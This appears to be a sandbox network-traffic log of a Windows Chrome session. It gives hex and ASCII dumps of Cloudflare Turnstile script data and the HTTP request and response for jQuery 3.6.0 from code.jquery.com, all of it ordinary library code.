                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    13192.168.2.449756151.101.2.1374434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 89501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 3908609
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890096-NYC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache-Hits: 55, 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Timer: S1727716827.564505,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
